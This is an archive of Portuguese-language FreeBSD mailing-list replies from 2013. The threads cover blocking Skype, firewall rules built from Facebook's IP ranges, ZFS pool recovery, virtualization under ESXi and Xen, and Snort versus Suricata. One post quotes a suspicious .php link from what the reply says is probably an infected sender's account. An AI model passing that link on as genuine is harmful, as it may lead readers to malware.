Em 6 de julho de 2013 15:23, Vinícius Zavam egyp...@googlemail.comescreveu: algo contra snort/suricata? uma pagina da universidade de columbia reune alguns documentos/artigos/slides interessantes; vale a pena perder um tempo lendo para ajustar a solucao no teu cenario. -- Vinícius Zavam profiles.google.com/egypcio Usei muito tempo atrás o Snort + OSSEC com Active Response... recente fiz alguns testes com o Suricata. Poste o link dessa páigna que comentou (Google não ajudou muito :p ). Acho bem difícil detectar algum padrão no tráfego do Skype (as regras que encontrei são bem antigas): http://www.md3v.com/block-skype-with-snort http://www.carbonwind.net/Firewalls/BlockingSkypewithPfsenseandSnort/BlockingSkypewithPfsenseandSnort.htm Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Como Bloquear Skype
2013/7/5 Luciano Bissoli luciano.biss...@bsd.com.br Alguem chegou em alguma solução para o bloqueio do skype?? Luciano, bom dia! Mesmo usando L7 é difícil bloquear, é tudo criptografado, veja: http://l7-filter.sourceforge.net/protocols Poderia indicar o ipfw-classifyd que é baseado no iptables-l7 (usa as mesmas regras), mas de acordo com o link acima mesmo o iptables-l7 (Linux) não consegue bloquear o skype. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Como Bloquear Skype
Em 5 de julho de 2013 13:42, Rogério Moura roger...@gmail.com escreveu: Eu fiz isso uma vez usando o squid Segue um exemplo: http://www.htmlstaff.org/ver.php?id=23808 Lembrando que para isso funcionar, não pode ser com proxy transparente, seu firewall deve bloquear acesso direro a Internet na porta 80 e 443 forçando assim passar pelo squid Fiz isso em alguns clientes que usam pfSense... bloqueei todas as portas, e deixei o acesso somente via proxy, e no proxy bloqueei tudo, liberando apenas domínios governamentais... dessa forma você bloqueia o Skype (como também Tor, etc.)... o problema é que isso gera MUITO trabalho para o TI rsrs... por exemplo, em um supermercado onde o setor de compras precisa acessar diversos sites de fornecedores, fazer buscas no Google, etc... enfim, em alguns ambientes é inviável. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [Off-Topic] - Compatibilidade do Freebsd em Servidores Dell PowerEdge
Em 25 de junho de 2013 15:18, Eng Eder de Souza eder.so...@bsd.com.brescreveu: Ola lista ! O pessoal da lista tem usado o FreeBSD sem grandes problemas em servidores Dell PowerEdge ? Estou enfrentando alguns problemas com um R720, a controladora de rede BCM5720 insiste em dar watchdog timeout -- resetting error, estou usando o FreeBSD 9.1, compilei alguns drivers do fabricante para Freebsd, mas ainda sem efeito :-(. Estou tentando recompilar o kernel para a versão stable e ver se o problema some, não estou com muita esperança que isso resolva ... Uma outra duvida, alguém usa HBA QLogic 2560 no FreeBSD 9.1 ? Agradeço se alguém tiver dicas ! Eder Bom dia Eder. Tenho alguns T410 e T300, e quando fui instalar o FreeBSD acabei abortando por não ter como rodar o sistema de gerenciamento da Dell (OpenManage eu acho). Acabei optando por instalar o ESXi (tem um bundle do sistema de gerenciamento fornecido pela Dell) e deixar o BSD como guest. Roda muito bem. Logicamente tenho alguma perda de desempenho por causa da camada de virtualização, mas a facilidade de manutenção acaba compensando (tipo, faço backup das máquinas virtuais, e quando necessário posso mover para outro hardware). Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OFF-TOPIC]Como ter garantia de ser respondido sobre dúvidas de BSD?
Em 22 de junho de 2013 11:38, Jorge Luis Carvalho Santos jorgeassembl...@outlook.com escreveu: Eric Raimond diz no guia Como fazer perguntas inteligentes, no título Antes de perguntar, Nunca assuma que você merece uma resposta. Você não merece; você não está, afinal de contas, pagando por este serviço. Você irá ganhar uma resposta, se ganhar, fazendo perguntas substanciais, interessantes e intrigantes - uma que contribua com a experiência da comunidade ao invés de apenas extrair conhecimentos dos outros. Se o usuário não ganhar a resposta ou se as comunidades de BSD, por exemplo, a lista e o fórum FUG-BR estiverem paradas, a quem se deve pagar para ter garantia de ser respondido sobre dúvida de BSD? Para mim será frustrante fazer o FreeBSD Server e System Administration da FreeBSD Brasil se depois de fazer esse curso não ganhar resposta de comunidade BSD ou se as comunidades de BSD estiverem paradas, pois não sei inglês para ser ajudado pela freebsd.org. Essa foi boa rsrsrsrs Não quero gerar flame war, até porque também uso Linux para alguns serviços em específico, mas as listas de discussão de Linux aqui no Brasil são muito mais paradas que essa (geralmente só rola spam =) (se bem que de parada essa lista não tem nada) Jorge, por favor, não me entenda mal, qual seu objetivo nessa lista? desde que entrou só vejo perguntas não técnicas que sempre termina em confusão. Em nenhuma lista de discussão de software livre há garantia de resposta! Não sei de onde tirou isso! Mas se quer PAGAR pra ter suporte profissional de FreeBSD, fale com Patrick que a FreeBSD Brasil fornece esse tipo de serviço. Lembrei da piada de um amigo: o povo quer ir para o céu mas não quer morrer k Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Timeout SSH
Em 20 de junho de 2013 02:42, Rodrigo Gonçalves Crescencio rodr...@rcsolucoesinteligentes.com.br escreveu: Pessoal bom dia ! Estou tentando configurar o timeout do SSH, porem o mesmo não está atuando, no sshd_config foram descomentadas e configuradas as linhas abaixo: #ClientAliveInterval 15 #ClientAliveCountMax 3 Acredito que esse parâmetro não detecta inatividade. Veja se isso ajuda: http://www.dicas-l.com.br/arquivo/variavel_tmout.php#.UcLznD5gZvY http://forums.freebsd.org/showthread.php?t=6171 Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] NetBSD - XEN.
Em 18 de junho de 2013 03:33, Paulo Henrique paulo.rd...@bsd.com.brescreveu: E alguem ai usa VirtualBox ? Não me aprofundei muito, mais estou a transferir 11 maquinas virtuais de servidores e em 3 anos nunca tive problemas. O Ambiente é FreeBSD como hospedeiro de 6 maquinas Win7, 3 Win Server 2K3 e 2 WinXP Não utilizou redundância ainda, para isso dois novos servidores estão a caminho. -- :=)(=: Rip NoRm4nD. Flamers /dev/null !!! Com FreeBSD não, mas tenho com Linux CentOS (servidor de homologação de aplicações Java). Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] NetBSD - XEN.
Em 18 de junho de 2013 07:20, Welkson Renny de Medeiros welk...@gmail.comescreveu: Com FreeBSD não, mas tenho com Linux CentOS (servidor de homologação de aplicações Java). Welkson Voltando ao Xen + BSD, a BSD Magazine desse mês tem um artigo sobre o assunto: http://bsdmag.org/magazine/1842-freebsd-on-rails Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] NetBSD - XEN.
Em 17 de junho de 2013 10:20, Adiel de Lima Ribeiro adiel.netad...@gmail.com escreveu: O post está ficando interessante. Eu não falei que Vmware é ruim, pelo contrário, é uma ótima ferramenta de virtualização. Apesar de a escolha da ferramenta não depender unicamente de nós do TI, eu acredito que seja desperdício de conhecimento e $$$ utilizarmos o Vmware, sendo que podemos utilizar o Xen. -- att, Adiel de Lima Ribeiro Adiel, bom dia! O FreeBSD roda bem como guest no Xen? (desempenho, estabilidade, etc.) Como host eu sei que tem uma galera trabalhando (mas ainda não tá 100%): http://blog.xen.org/index.php/2012/09/12/freebsd-xen-support-a-quick-status-update/ O VMWare atende bem, mas sempre tive vontade de montar pelo menos um dos servidores com Xen (Amazon e outras gigantes usam), mas na época que iniciei a implantação dos servidores virtualizados (uns 3 anos atrás), o Xen não me parecia uma boa solução pra FreeBSD (faz tempo, não lembro exatamente o motivo). Mas enfim, pretendo dar uma estudada no Xen. Eu acredito que é até mais tranquilo para integrar com o OpenStack (que também pretendo estudar mais a fundo). Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] NetBSD - XEN.
Em 17 de junho de 2013 12:13, Adiel de Lima Ribeiro adiel.netad...@gmail.com escreveu: Welkson, bom dia. Roda sim, inclusive o Amazon até oferece servidores FreeBSD, e a plataforma que eles utilizam é o XEN, falando nisso, mais 2 gigantes que o utilizam, Google e NASA. Eu não me lembro bem, mas parece que o XEN ficou abandonado uns tempos atrás, mas agora está a todo o vapor. Aqui na página do projeto XEN, existem alguns casos de sucesso para quem se interessar: http://www.xenproject.org/users/success-stories.html -- att, Adiel de Lima Ribeiro Amazon oferece FreeBSD? tem mais detalhes? Pelo que vi, trata-se do port que o Perciva vem trabalhando: http://www.daemonology.net/freebsd-on-ec2/ Mas acredito que isso não é suportado oficialmente pela Amazon (é um hack). Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] NetBSD - XEN.
Em 17 de junho de 2013 14:04, Adiel de Lima Ribeiro adiel.netad...@gmail.com escreveu: Não sei se é hack, mas em nosso plano, tinhamos a opção de servidores FreeBSD, na página deles tem a opção. https://aws.amazon.com/marketplace/pp/B00AA25MLK -- att, Adiel de Lima Ribeiro FreeBSD (64-bit cluster compute) Sold by: Colin Percival -- Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] NetBSD - XEN.
Em 14 de junho de 2013 18:47, Renato Frederick ren...@frederick.eti.brescreveu: Não é flame war, apenas acho importante postar na lista que o vmware funciona OK com BSD, senão daqui a pouco vai ter gerente de TI que joga no google sobre isto, vai ver na lista e falar: Não vamos usar BSD no vmware porque é ruim. Escala depois para 3 máquinas, faz um cluster com load balance + um NAS fiber ou iscsi, que aí vamos entender que é preciso solução de mercado. Verdade Renato. Uso FreeBSD 9.1 amd64 (com ZFS) no ESXi 5.1 a 6 meses e até agora nenhum problema (Dell T410 com RAID 1 usando discos SAS 15K RPM). Pra fechar o pacote é só usar o Veeam para fazer backup das VM's. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Livro FreeBSD - O poder dos servidores em suas mãos
Em 14 de junho de 2013 13:34, mateus schott mateussch...@gmail.comescreveu: Muito obrigado pelo retorno pessoal! Vou entrar em contato com a editora. Recomendo o livro! Comprei assim que foi lançado. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Como Bloquear Skype
Em 14 de junho de 2013 07:12, Tiago Ribeiro sha...@gmail.com escreveu: Em 13/06/13 16:34, Luiz Gustavo S. Costa escreveu: On Thu, 13 Jun 2013 16:27:32 -0300 (BRT) Luiz, bom dia, durante esta semana pesquisando como bloquear o facebook via iptables, achei um comando bem interessante: whois -h whois.radb.net '!gAS32934' No Linux (centOS) me retorna os ranges, da mesma forma que você mostrou no site, só que via linha de comando, e depois é só jogar nas regras, até ai tudo bem. 1- Eu entendi o que o comando faz, mais confesso que não compreendi o parametro !g 2- Tentei rodar no FreeBSD e não rolou, alguém ai tem alguma dica pra rodar esta consulta no FreeBSD? Aqui rolou tranquilo: root@fw / % whois -h whois.radb.net '!gAS32934' A939 204.15.20.0/22 69.63.176.0/20 66.220.144.0/20 66.220.144.0/21 69.63.184.0/21 69.63.176.0/21 74.119.76.0/22 69.171.255.0/24 173.252.64.0/18 69.171.224.0/19 69.171.224.0/20 103.4.96.0/22 69.63.176.0/24 173.252.64.0/19 173.252.70.0/24 31.13.64.0/18 31.13.24.0/21 66.220.152.0/21 66.220.159.0/24 69.171.239.0/24 69.171.240.0/20 31.13.64.0/19 31.13.64.0/24 31.13.65.0/24 31.13.67.0/24 31.13.68.0/24 31.13.69.0/24 31.13.70.0/24 31.13.71.0/24 31.13.72.0/24 31.13.73.0/24 31.13.74.0/24 31.13.75.0/24 31.13.76.0/24 31.13.77.0/24 31.13.96.0/19 31.13.66.0/24 173.252.96.0/19 69.63.178.0/24 31.13.78.0/24 31.13.79.0/24 31.13.80.0/24 31.13.82.0/24 31.13.83.0/24 31.13.84.0/24 31.13.85.0/24 31.13.86.0/24 31.13.87.0/24 31.13.88.0/24 31.13.89.0/24 31.13.90.0/24 31.13.91.0/24 31.13.92.0/24 31.13.93.0/24 31.13.94.0/24 31.13.95.0/24 69.171.253.0/24 69.63.186.0/24 204.15.20.0/22 69.63.176.0/20 69.63.176.0/21 69.63.184.0/21 66.220.144.0/20 69.63.176.0/20 root@fw / % uname -a FreeBSD fw.intranet.xxx.com.br 9.1-RELEASE FreeBSD 9.1-RELEASE #2: Wed Dec 26 14:07:24 UTC 2012 r...@fw.intranet.xxx.com.br:/usr/obj/usr/src/sys/XXX amd64 Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] acessa hd com ZFS.
Em 29 de maio de 2013 18:34, Alessandro de Souza Rocha etherlin...@gmail.com escreveu: Bom galera o seguinte tinha montando um servidor FreeBSD 9.0 com zfs e samba servidor de arquivos, so que a placa mae do danado queimou a placa e antiga nao conseguir uma igual, coloquei o hd em outra maquina tentar recupar os arquivos so que nao estou conseguindo montar alguma dica pois sao 600gb de arquivos. -- Alessandro de Souza Rocha Administrador de Redes e Sistemas FreeBSD-BR User #117 Fala Alessandro, beleza? Cara, eu não sou nenhum expert em ZFS (inclusive você me ajudou bastante na implantação via GTalk no início desse ano =) Alguns dias após a implantação do ZFS eu dei um vacilo no loader.conf e o sistema deixou de bootar. Depois de muito Google eu consegui resolver e fiz um pequeno how-to, espero que ajude: 1- boot com o CD do FreeBSD, escolha a opção LiveCD (só aparece essa pergunta na 2 ou 3 tela); 2- Ao chegar no login, informe o usuário root, e o sistema irá acessar sem senha; 3- Tente montar o pool ZFS da seguinte forma: zpool set bootfs=zroot zroot zfs set checksum=fletcher4 zroot zfs set mountpoint=/mnt zroot 4- Se tudo correr bem, na pasta /mnt estará seu sistema de arquivos, basta editar o /mnt/boot/loader.conf; 5- Antes de rebootar desmonta o pool ZFS digitando: zfs umount -a Faz bastante tempo que usei isso, então não lembro muitos detalhes. Abraço, Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Hardware to virtualization.
Em 20 de maio de 2013 16:26, Elias Motta t...@engemoldeengenharia.com.brescreveu: Boa tarde Lista, Dias atras os colegas trocaram ideia a respeito de hardware pra virtualização ESXi, alguns sugeriram motherboard Supermicro que vai bem com FreeBSD. Gostaria de sugestão de onde comprar essa marca aqui no brasil. Obs. sou do RS. Elias Motta TI - Engemolde 3597.2033 | 3597.8802 t...@engemoldeengenharia.com.br Dell funciona muito bem com ESXi (até mesmo os modelos mais básicos como T300, T4xx, etc.). Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Fwd:
2013/4/16 Julio Cesar ju...@bsd.com.br http://www.bekcanmetal.com.tr/7iffuj.php Bom dia! Verifica seu pc Júlio, acho que está infectado. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [off-topic] php 5.4
Em 10 de maio de 2013 15:43, Marcelo Gondim gon...@bsdinfo.com.brescreveu: Pessoal, Desculpem o off-topic novamente mas estou procurando alguma explicação lógica pro seguinte e até agora não encontrei nada. :( Em um servidor estava rodando o php 5.3 e foi atualizado para o php 5.4. Algumas mudanças tiveram que ser feitas, logicamente. Mas tudo está funcionando e do nada sou deslogado do site, não consigo mais me logar. Dá uns erros doidos de chamada de função com nomes esquisitos tipo $%ˆ_() e nos logs não diz nada que ajude. Tudo o que faço pra voltar à funcionar é editar o arquivo de funções backend/functions.php e sem alterar nada saio salvando. Pronto, volta à funcionar por um tempo. Não vi lógica alguma nisso até agora, só sei que com o php 5.3 isso não estava ocorrendo. rsrsrs Carabina você já viu isso? Alguém aqui da lista que programe e use o php 5.4 já passou por isso? []'s Gondim Gondim, Pelo que vi, teve algumas mudanças significativas: http://php.net/manual/en/migration54.incompatible.php http://php.net/manual/pt_BR/migration54.php Não tem como comentar muito sem conhecer o código da aplicação, mas acredito que esses links possam ajudar. Abraços, Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 9.0-RELEASE Congelando
Em 18 de abril de 2013 09:39, Bruno Oliveira brnolv...@gmail.com escreveu: Bom dia, Tenho uma servidor virtualizado com FreeBSD 9.0-RELEASE* e estou passando por um problema estranho. Todo dia entre 08:00 e 09:00 horas o servidor congela, reinicio e volta ao normal. No ambiente do ESXi não mostra nenhum overflow de CPU/Memória/Disco. Qual arquivo de registro tenho que analisar para tentar entender o que está acontecendo? Neste servidor tenho qmail, vpopmail, apache, mysql, roundcube, spamassasim e clamav. *FreeBSD mail.domain.local 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:15:25 UTC 2012 r...@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i38 -- Abs, Bruno Oliveira Fala Bruno, beleza? Cara, no final de 2012 eu migrei um BSD para um ambiente virtualizado (Dell PowerEdge, discos SAS 15K RPM, rodando ESXi 5.1)... usei FreeBSD 9 amd64 (com ZFS)... desde então, não tenho o reclamar... as poucas vezes que precisei desligar foi por causa de energia, e olha que rodo muita coisa: * Dansguardian; * Servidor web com vários sites, proxy reverso, etc.; * Firewall com controle de banda; * OpenVPN com 6 filiais penduradas; * Samba; * OpenFire (Java, bem pesado); * Banco de dados (Postgres); O único cuidado que tive foi instalar as atualizações do ESXi 5 (se não me engano tem um patch que corrige uns bugs, entre eles o auto-start das máquinas que não funciona), e usei o openvmwaretools que está no ports alguns tunnigs que já usava no pc anterior no sysctl e loader.conf. Abraços, Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Skype 4 no FreeBSD
Em 30 de janeiro de 2013 12:26, Ricardo Carlini Sperandio rcarl...@gmail.com escreveu: 2013/1/24 Tiago Ribeiro sha...@gmail.com Em 24 de janeiro de 2013 09:22, Felipe Nogueira Oliva felipe.n...@gmail.com escreveu: Eu ja tentei de tudo, ate emular pelo Wine. Estava acompanhando no twitter as notícias sobre o Campus Party e vi isso: TechEd Brasil @techedbrasil Você usa Linux e gostaria de utilizar Skype? Isso não é mais um problema. Agora o Skype roda no Linux!#cpbr6 Palco Sócrates! Se alguém tiver no Campus Party, vai lá no stand da Microsoft e diga que isso é mentira =) Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Skype 4 no FreeBSD
Em 30 de janeiro de 2013 13:18, Ricardo Carlini Sperandio rcarl...@gmail.com escreveu: Uai, mas o skype sempre rodou no linux, a diferença é que antes ele suportava tanto o oss como o alsa como o pulseaudio, agora é alsa ou nada. O problema não é o rodar nos linux mas sim nos BSD, ou então num linux sobre ARM/sparc, etc... -- Ricardo Carlini Sperandio Pois é, sempre vi Linux lá na lista de downloads do skype... mas confesso que nunca precisei instalar Skype em ambientes *nix. Pelo jeito a Microsoft depois que comprou o Skype já começou a dificultar a vida de quem não usa Windows... Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [Off-Topic] SkypeMSN
Em 25 de janeiro de 2013 15:25, Lucas Dias lucas...@gmail.com escreveu: Pode até funcionar, mas googlando por esses dias, achei que o Skype funciona na base P2P. Conversando com um amigo, ele me disse que liberou apenas para uma estação (The Boss) na rede dele, e depois de alguns dias, ele viu por coincidência, um outro usuário usando. Investigou e viu que só passava pelo firewall o o IP liberado para usar o Skype. Percebeu também, por coincidência, que quando o IP liberado não estava em uso, ou seja, The Boss não estava no prédio, o Skype realmente não funcionava. Resultado: Se apenas uma maquina for liberada, ela servirá de proxy para as outras. Sinistro =) Vou fazer um PoC sobre isso e confirmo depois com meus testes. Além de P2P, ainda criptografa... to vendo que a solução será daqui a pouco da própria Skype (MS). -- .:: Lucas Dias .:: OS3 Soluções em TI .:: (82) 8813-1494 / 8111-2288 .:: Antes de imprimir, veja se realmente é necessário!!! Lucas, percebi a mesma coisa a alguns anos. Skype é pior que vírus =) Esse paper é um pouco antigo, mas talvez ajude a matar a curiosidade: http://www1.cs.columbia.edu/~library/TR-repository/reports/reports-2004/cucs-039-04.pdf Nesse paper acima logo no começo informa o seguinte: Any node with a public IP address having sufficient CPU, memory, and network bandwidth is a candidate to become a super node Alguns outros: http://www.ossir.org/windows/supports/2005/2005-11-07/EADS-CCR_Fabrice_Skype.pdf http://lib.tkk.fi/Dipl/2007/urn009990.pdf http://www.tlc-networks.polito.it/oldsite/mellia/papers/CR_skype_TMM.pdf Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD no ESXi 5.1 (open-vm-tools x vmware tools oficial) - problemas com Clang
Em 10 de janeiro de 2013 09:38, Welkson Renny de Medeiros welk...@gmail.com escreveu: Senhores, bom dia! A cerca de 15 dias migrei um BSD antigo (FreeBSD 7.0 i386) para um novo hardware (Dell com HD SAS 15K RPM com RAID 1 usando controladora Perc, etc.). Como o novo hardware é suportado pelo VMWARE, e já uso VMWARE ESXi a algum tempo com outros SO`s (Linux, Windows), decidi então instalar o FreeBSD virtualizado. Baixei o FreeBSD 9.1 (ainda não tinha sido lançado a ISO oficial, por sorte que quando lançaram não houve qualquer mudança), e instalei a versão AMD 64 sobre o ESXi 5.1. Conversando sobre o processo de instalação com o Wellinaldo (GTalk), ele me sugeriu usar o ZFS (eu tinha a impressão que ZFS era meio gambiarra, mas muita gente já está usando em produção, então vamos lá...)... instalei com ZFS, etc. Chegou na parte de instalar o VMWARE Tools... como a VMWARE suporte o FreeBSD 9 (no meu caso é 9.1, não sei como fica), decidi então não usar o Open-VM-Tools (como o ESXi 5.1 foi lançado a pouco tempo, não sei como está o suporte pra ele). Montei o CD-ROM com a instalação do VMWARE-TOOLS, segui os passos descritos nesse site: http://www.rhyous.com/2012/05/09/installing-vmware-tools-on-freebsd-9-without-xorg/ Observe que eles recomendam desativar o clang no MAKE.CONF (ou seja, usar o GCC puro), e recompilar o kernel... eu fiz isso, tentei recompilar, e foi exibido um erro exatamente na linha do make.conf que desativa o Clang (não lembro o erro, mas para o momento não vem ao caso). Tentei algumas dicas da internet, não funcionou... usei então o Open-VMWARE-Tools do ports... compilou tudo certinho, carregou os módulos, configurei o RC.CONF, etc já está em produção a algumas semanas, e está tudo funcionando sem problema algum. Minha pergunta é a seguinte: o que vocês acham mais seguro? usar o Open-VMWARE-Tools e seus possíveis bugs [1], ou tentar resolver esse problema do make.conf usar a distro oficial da vmware? (lembrando que eles desativam o clang, e pelo que li, o clang será o C oficial do BSD daqui pra frente... em resumo: os erros que alguns ports tem hoje por não serem compatíveis com clang pode ocorrer ao contrário no futuro, ports quebrarem porque não rodam com GCC). Espero ter sido claro. Welkson Renny Esqueci de postar o link para os tickets abertos para open-vm-tools: http://sourceforge.net/tracker/?limit=25func=group_id=204462atid=989708assignee=status=category=artgroup=keyword=submitter=artifact_id=assignee=status=1category=artgroup=submitter=keyword=artifact_id=submit=Filter Monte de coisa para BSD... mas pelo que vi, o software vem sendo atualizado constantemente. Welkson Renny - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD no ESXi 5.1 (open-vm-tools x vmware tools oficial) - problemas com Clang
2013/1/10 Welinaldo Lopes Nascimento welina...@bsd.com.br Complementando o erro que ocorre ao compilar o vmblock do vmware-tools: Warning: Object directory not changed from original //vmware-tools-distrib/lib/modules/source/vmblock-only @ - /usr/src/sys machine - /usr/src/sys/amd64/includex86 - /usr/src/sys/x86/include awk -f @/tools/vnode_if.awk @/kern/vnode_if.src -p awk -f @/tools/vnode_if.awk @/kern/vnode_if.src -q awk -f @/tools/vnode_if.awk @/kern/vnode_if.src -h cc -O2 -pipe -Wall -Werror -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdinc -I. -I@ -I@/contrib/altq -finline-limit=8000 --param inline-unit-growth=100 --param large-function-growth=1000 -fno-common -fno-omit-frame-pointer -mcmodel=kernel -mno-red-zone -mno-mmx -mno-sse -msoft-float -fno-asynchronous -unwind-tables -ffreestanding -fstack-protector -std=iso9899:1999 -fstack-protector -Wall -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -fformat-extensions -Wmissing-include-dirs -fdiagnostics-show-option -c block.c cc -O2 -pipe -Wall -Werror -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE (.) vfsops.c:387: error: 'VFS_STATFS' undeclared (first use in this function) vfsops.c: At top level: vfsops.c:427: error: conflicting types for 'VMBlockVFSSync' vfsops.c:70: error: previous declaration of 'VMBlockVFSSync' was here *** [vfsops.o] Error code 1 Wellinaldo, Se puder, posta o erro que ocorre ao tentar compilar o kernel sem clang (alteração feita no make.conf). Provavelmente esse seu erro é porque esse código não compila com clang, só com GCC. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OFF-TOPIC] Suricata x Snort - o que muda?
Em 2 de janeiro de 2013 12:05, Welkson Renny de Medeiros welk...@gmail.comescreveu: Senhores, bom dia! Estou a alguns dias implantando um novo servidor (FreeBSD 9.1 amd64 sob ESXi 5.1), e cheguei na parte de segurança. No servidor antigo eu tinha Snort + OSSEC (com Active Response) + Base... as versões eram bem antigas... decidi então nesse novo servidor (com BSD 9.1) usar as mais atuais... A primeira bronca foi logo com o Snort, que nessa versão não mais permite fazer output em banco de dados [1]... instalei o tal do Barnyard2, mas ainda não consegui gerar os logs do Snort no padrão que o Barnyard entende (Unified2)... quando ativo qualquer tipo de output, os logs deixam de ser gerados... com todos os outputs comentados, pelo menos o /var/log/snort/alert funfa direitinho (mas o Barnyard não interpreta isso). A algum tempo vi o Patrick comentando sobre o Suricata, que me parece ser um fork do Snort. Alguém tem usado? output database funfa direitinho? compatível com as rules do Snort? [1] http://blog.snort.org/2012/07/database-output-is-dead-rip.html Feliz 2013 a todos! =) Welkson Renny Natal/RN Fazendo mais buscas encontrei algumas respostas. De acordo com o link abaixo, Emerging Threats não funciona no Snort (eu uso essas rules) - SO rules não conhecia: http://www.aldeid.com/wiki/Suricata-vs-snort#Rules http://www.aldeid.com/wiki/EN:Snort/Rules/SO_Rules Não vi database na lista de Outputs: http://suricata-ids.org/features/all-features/ Qualquer comentário sobre Snort x Suricata será bem vindo. Welkson Renny Natal/RN - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OFF-TOPIC] Suricata x Snort - o que muda?
Em 2 de janeiro de 2013 18:52, Antônio Pessoa atnpes...@gmail.comescreveu: No endereço abaixo [1] você vai encontrar um material do próprio Patrick Tracanelli sobre os dois, com comparativos bem interessantes, acredito que valha a pena você dar uma olhada. [1] http://www.bhack.com.br/talks/Patrick/BHACK2.pdf -- Atenciosamente, Antônio Pessoa Baixei os slides do BHack a algumas semanas mas ainda não tinha analisado :( Cara, vendo as explicações do Patrick... o Suricata parece muito interessante! =) Amanhã vou instalar e dar uma brincada. Obrigado pela dica meu amigo! Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] O melhor presente de final de ano. - FreeBSD 9.1-RELEASE
Em 31 de dezembro de 2012 08:21, Marcelo Gondim gon...@bsdinfo.com.brescreveu: Oi Celso, Eu chequei as MD5 dos disc1 tanto amd64 e i386 e são as mesmas de quando saiu, ou seja, são as mesmas ISOs. Não sei as outras. :) []'s Gondim Ufa! Baixei o 9.1 amd64 e instalei no ESXi 5.1 a poucos dias! Está em produção com ZFS! Uma bala! =) Estava com medo de ocorrer alguma mudança no lançamento oficial e ter que reinstalar (ou fazer algum tipo de update). Feliz 2013 1 todos! Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [Off-Topic] Mac Ports
Em 18 de dezembro de 2012 08:15, Frederico Terra Boechat fboec...@gmail.com escreveu: Tem o fink, já usei aqui mas preferi o macports. Dá uma inchada no Mac OS por conta do XCode mas me teve bastante serventia :) Mac OS, pra mim, é o melhor dos dois mundos, rodo um BSD ao mesmo tempo em que eu tenho um desktop BOM Frederico Boechat Uso o HomeBrew, muito bom. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Firebird não Comunica
